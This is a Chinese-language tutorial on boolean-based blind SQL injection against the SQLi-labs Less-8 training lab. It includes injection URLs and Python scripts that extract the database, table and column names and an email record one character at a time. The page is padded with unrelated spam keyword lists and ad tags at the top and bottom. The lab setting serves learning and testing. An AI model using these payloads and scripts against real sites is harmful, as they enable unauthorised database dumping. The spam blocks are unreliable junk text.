婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > SQL注入之基于布爾的盲注詳解

SQL注入之基于布爾的盲注詳解

熱門標簽:怎么去開發一個電銷機器人 ai電話電話機器人 小程序智能電話機器人 簡單的智能語音電銷機器人 河北便宜電銷機器人軟件 泗洪正規電話機器人找哪家 湖南保險智能外呼系統產品介紹 怎么申請400熱線電話 南昌呼叫中心外呼系統哪家好

基于布爾的盲注

Web的頁面的僅僅會返回True和False。那么布爾盲注就是進行SQL注入之后然后根據頁面返回的True或者是False來得到數據庫中的相關信息。

由于本次是布爾注入,手注無法完整地進行脫褲。所以在本節需要編寫大量的代碼來幫助我們進行SQL注入,得到數據。所以在這章里面會有很多的Python代碼。

本次的示例就是Less-8。

通過進行下面的語句的注入測試

http://localhost/sqlilabs/Less-8/?id=2'
http://localhost/sqlilabs/Less-8/?id=2"
http://localhost/sqlilabs/Less-8/?id=2\

進行測試的時候,只有在id=2'的時候頁面無法顯示內容。輸入的語句如果符合要求,頁面就會顯示內容,但是顯示的內容都是一樣的。這種情況下頁面上的輸出對于我們來說是完全沒有用的,包括SQL執行出錯的信息都不會在頁面上顯示。這種情況下之前的通過執行SQL語句然后在頁面上顯示SQL執行之后返回的信息完全是不可能的啦。這種情況下就是一個典型的SQL盲注了。

我們通過頁面是否顯示內容來判斷我們的SQL語句是否正確,進而猜解數據庫的信息。

通過上面的注入測試,我們知道后臺的SQL的注入語句的寫法是:

select field from table where id='userinput'

id參數是被單引號包括的。其他的信息我們就無法得到了。

得到數據庫的名稱

在得到數據庫的名稱之前,首先需要得到數據庫的長度

http://localhost/sqlilabs/Less-8/?id=2' and length(database())>1 %23
http://localhost/sqlilabs/Less-8/?id=2' and length(database())>2 %23
以此類推
.....

發現當值為8的時候,頁面就沒有顯示。那么說明database()的長度是8。

得到了datbase()的長度之后,接下來就是得到database()的名稱了。

這個時候就不能完全靠手注了,必須編寫Python代碼來完成。其中最主要就是進行大量的注入測試來判斷程序執行正確和出錯的時機,然后斷定當前的值可能就是正確的值。

下面就是一個簡單的使用Python來進行布爾盲注獲取數據的代碼。

def get_db_name():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr(database(),{0},1))>{1} %23"
 chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
 for i in range(1,9):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的長度只有706和722
   if length>706:
    result += char
    break
 print(result)

得到最后的結果的是security,是正確的。

得到數據庫中的表信息

其實所有的SQL注入步驟都是類似的。首先得到數據庫的名稱(這一步不是必須的),然后得到當前數據庫的表名稱,然后得到表的字段,最后進行脫褲。這個步驟在前一章已經有說明了。

首先看一個簡單的SQL盲注獲取數據庫表信息的寫法。

http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>60 %23

其實還是使用之前的select table_name from information_schema.tables where table_schema=database() limit 0,1這樣的語句來得到表的信息,但是現在是無法在頁面上顯示的,而是通過盲注來一個字符一個字符的獲取表名。

接下也同樣是通過編寫Python代碼來獲取表名了。代碼也和上面的類似。主要就是修改中的URl。在進行Python獲取表名之前,我們同樣需要知道表名的長度。

使用如下的語句就可以得到了。

獲取表名的SQL注入的寫法就是如下

http://localhost/sqlilabs/Less-8/?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23

通過這種方式我們知道數據庫表中的第一個表名的長度是6。知道了表名的長度之后,接下來的Python腳本就很好寫了。

def get_table_name():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0},1))>{1} %23"
 chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
 for i in range(1,7):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的長度只有706和722
   if length>706:
    result += char
    break
 print(result)

最后得到了第一個表名是emails,如果要得到其他的表名只需要將代碼limit 0,1修改成為limit 1,1或者是其他的就可以了。

得到表名的列信息

在得到列名之前,同樣需要知道在表中的字段長度。例如我們想要知道在emails表中的長度,那么就可以使用如下的語句來獲取。

http://localhost/sqlilabs/Less-8/?id=2' and (select length(column_name) from information_schema.columns where table_name=0x656d61696c73 limit 0,1)>【num】 %23

修改num的值即可,從0開始一直到到程序出錯。通過這種方法,我們得到在emails中存在2個字段,字段的長度分別是2,8。
得到了字段長度之后,接下來就是進行布爾注入得到字段名稱了。

在編寫代碼之前,還是來看如何寫獲取字段名稱的sql語句吧。下面這個代碼就是用來獲取字段名稱的代碼。

http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),1,1))>60 %23

我們編寫的Python代碼也是利用上面這個代碼來獲取字段名稱。

def get_column_name():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),{0},1))>{1} %23"
 chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
 for i in range(1,3):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的長度只有706和722
   if length>706:
    result += char
    break
 print(result)

通過上面這個代碼,我們可以得到在emails表中存在的字段名稱分別是idemail_id

脫褲

在得到了字段名稱之后,接下來最重要的一步就是進行脫褲了。
在進行脫褲之前,我們首先判斷在emails表中有多少條記錄。

使用的語句如下:

http://localhost/sqlilabs/Less-8/?id=2' and (select count(*) from emails)>0 %23

修改>0中的0依次為1,2,3之后,我們得到在emails表中一共存在8條記錄。

那么接下來就是進行脫褲了。

在脫褲之前,我們首先要知道當前記錄的長度,這個SQL語句也很好寫。

http://localhost/sqlilabs/Less-8/?id=2' and (select length(email_id) from emails limit 0,1)>15 %23

最后我們知道在emails表中的第一條記錄中的email_id的長度是16.

知道了長度之后,代碼就很好寫了。

def get_data():
 result = ""
 url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select email_id from emails limit 0,1),{0},1))>{1} %23"
 chars = '.0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
 for i in range(1,17):
  for char in chars:
   char_ascii = ord(char)
   url = url_template.format(i,char_ascii)
   response = requests.get(url)
   length = len(response.text)
   #返回的長度只有706和722
   if length>706:
    result += char
    break
 print(result)

通過上面的這段代碼就得到了內容是Dumb@dhakkan.com,其他的內容就同樣通過這段方式得到數據了。這里就不作演示了。

總結

其實基于布爾盲注和基于時間的盲注都是需要編寫大量的代碼,就像本篇的文章一樣。之前在簡單的SQL注入中,一句SQL注入代碼就可以解決的問題在這里就需要編寫Python代碼來進行大量的注入測試才能夠得到內容。其實之前我也很少完整的用Python來編寫SQL注入代碼完成整個布爾盲注的注入過程。通過本章的編寫,熟悉了使用Python代碼完整地進行一次布爾盲注的過程了,學習了很多。以上就是這篇文章的全部內容了,希望對大家能有所幫助。

您可能感興趣的文章:
  • SQL注入繞過的技巧總結
  • 淺談mybatis中的#和$的區別 以及防止sql注入的方法
  • sql注入之手工注入示例詳解
  • java 過濾器filter防sql注入的實現代碼
  • jquery過濾特殊字符'',防sql注入的實現方法
  • php簡單實現sql防注入的方法
  • Sql注入原理簡介_動力節點Java學院整理

標簽:那曲 瀘州 淮安 威海 荊門 江蘇 柳州 景德鎮

巨人網絡通訊聲明:本文標題《SQL注入之基于布爾的盲注詳解》,本文關鍵詞  SQL,注入,之,基于,布爾,的,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《SQL注入之基于布爾的盲注詳解》相關的同類信息!
  • 本頁收集關于SQL注入之基于布爾的盲注詳解的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    一区二区欧美视频| 国产制服丝袜一区| 亚洲天堂网中文字| 亚洲第一激情av| 久久99精品久久只有精品| 另类综合日韩欧美亚洲| 国产精品一区三区| 在线观看视频欧美| 日韩精品一区二| 亚洲欧美日韩电影| 精品一区二区在线播放| 91在线视频官网| 日韩欧美成人午夜| 日韩一区在线看| 美女视频黄 久久| 91麻豆成人久久精品二区三区| 制服丝袜亚洲精品中文字幕| 国产精品国产三级国产aⅴ无密码| 日本女人一区二区三区| 99re66热这里只有精品3直播 | 日韩欧美色综合网站| 国产网红主播福利一区二区| 亚洲影院理伦片| 成人丝袜高跟foot| 欧美tickle裸体挠脚心vk| 亚洲人成精品久久久久| 国产精品综合一区二区| 欧美日韩一区精品| 日韩一区有码在线| 国产成人丝袜美腿| 精品欧美一区二区三区精品久久| 亚洲黄色性网站| 成人看片黄a免费看在线| 91精品国产aⅴ一区二区| 亚洲女人小视频在线观看| 国产99久久精品| 精品少妇一区二区三区| 日韩精品免费专区| 欧美日韩中文一区| 亚洲一区免费视频| 不卡的av电影在线观看| 中文字幕欧美区| 国产乱码字幕精品高清av| 日韩欧美国产一区二区三区 | 视频一区免费在线观看| 91在线小视频| 成人欧美一区二区三区视频网页| 国产精品乡下勾搭老头1| 精品久久人人做人人爽| 美腿丝袜亚洲三区| 日韩欧美国产一区在线观看| 免费av成人在线| 日韩免费电影一区| 久久不见久久见免费视频1| 日韩欧美区一区二| 久久99精品国产麻豆婷婷| 欧美一级一级性生活免费录像| 天堂成人免费av电影一区| 欧美日韩1区2区| 天天综合网天天综合色| 欧美疯狂做受xxxx富婆| 日本视频免费一区| 91精品欧美一区二区三区综合在| 日韩电影在线观看电影| 日韩三区在线观看| 韩国三级中文字幕hd久久精品| 久久综合精品国产一区二区三区 | 国产三级一区二区| 国产成人亚洲综合a∨婷婷图片| 久久精品水蜜桃av综合天堂| 高清视频一区二区| 中文字幕一区二区三区四区| 99久久免费精品高清特色大片| 综合婷婷亚洲小说| 欧美在线你懂得| 亚洲v日本v欧美v久久精品| 91精品国产综合久久福利软件| 精品一区二区三区免费| 亚洲国产高清不卡| 欧洲一区二区av| 日韩精品欧美精品| 久久久久国产成人精品亚洲午夜| www.欧美亚洲| 亚洲国产aⅴ天堂久久| 欧美大度的电影原声| av在线不卡网| 天天综合天天综合色| 国产丝袜在线精品| 欧美影片第一页| 精品一二三四区| 亚洲精品视频在线看| 91精品国产全国免费观看| 国产91精品一区二区麻豆网站| 亚洲欧美一区二区不卡| 欧美成人精品二区三区99精品| 成人免费视频视频在线观看免费| 亚洲成av人片在线| 国产女主播视频一区二区| 色婷婷av一区二区| 国产乱码精品一区二区三区av | 日韩精品91亚洲二区在线观看 | 成人短视频下载 | 欧美日韩免费一区二区三区视频| 久久不见久久见中文字幕免费| 国产精品不卡在线| 日韩欧美国产不卡| 欧美无乱码久久久免费午夜一区 | 成年人午夜久久久| 蜜桃一区二区三区四区| 依依成人综合视频| 国产精品嫩草久久久久| 精品精品欲导航| 欧美精品一二三| 欧美性猛交一区二区三区精品| 国产91精品在线观看| 久久精品72免费观看| 亚洲国产一区二区视频| 国产精品久久久久久久久免费樱桃 | 免费成人在线播放| 亚洲精品久久嫩草网站秘色| 国产校园另类小说区| 欧美一区二区成人| 欧美美女网站色| 欧美男女性生活在线直播观看| 色噜噜久久综合| aaa亚洲精品| 不卡的电影网站| av在线综合网| 91在线观看地址| 99riav一区二区三区| 成人av影视在线观看| 国产一区二区久久| 国产精品一级片在线观看| 麻豆精品视频在线| 久久成人免费日本黄色| 美腿丝袜亚洲一区| 精品一区二区三区日韩| 麻豆国产一区二区| 精品综合免费视频观看| 韩国av一区二区三区四区| 久久99精品久久久| 国产激情一区二区三区| 高清国产一区二区三区| av在线这里只有精品| 欧美在线你懂得| 日韩一区二区不卡| 久久精品一区二区三区不卡牛牛| 久久久久久久久久久久久久久99| 久久精品夜夜夜夜久久| 国产日韩在线不卡| 17c精品麻豆一区二区免费| 一区二区三区四区乱视频| 亚洲国产一区二区在线播放| 日韩在线播放一区二区| 久久成人18免费观看| 成人精品高清在线| 在线观看亚洲一区| 日韩欧美国产高清| 国产精品久久久久aaaa| 夜夜精品视频一区二区| 日韩和欧美一区二区| 国模套图日韩精品一区二区| 成人激情电影免费在线观看| 色呦呦国产精品| 69堂国产成人免费视频| 久久久久久一级片| 亚洲视频图片小说| 蜜臀av一区二区在线观看| 国产精一品亚洲二区在线视频| av亚洲精华国产精华精| 欧美日韩免费一区二区三区视频| 日韩一区二区三区在线观看| 日本一区二区三区四区在线视频 | 亚洲电影一级黄| 久久精品国产**网站演员| www.亚洲在线| 在线成人免费观看| 欧美国产精品一区| 亚洲成人在线免费| 粉嫩aⅴ一区二区三区四区五区| 欧美专区日韩专区| 国产天堂亚洲国产碰碰| 亚洲一区成人在线| 国产在线视视频有精品| 日本韩国欧美一区| 久久综合久久综合九色| 亚洲午夜三级在线| 国产成人啪免费观看软件| 欧美丰满嫩嫩电影| 亚洲私人黄色宅男| 精品影视av免费| 欧美性色欧美a在线播放| 欧美国产国产综合| 久久精品99国产国产精| 在线看日本不卡| 国产片一区二区| 极品少妇xxxx精品少妇偷拍| 一本色道亚洲精品aⅴ| 国产亚洲1区2区3区| 麻豆国产欧美日韩综合精品二区|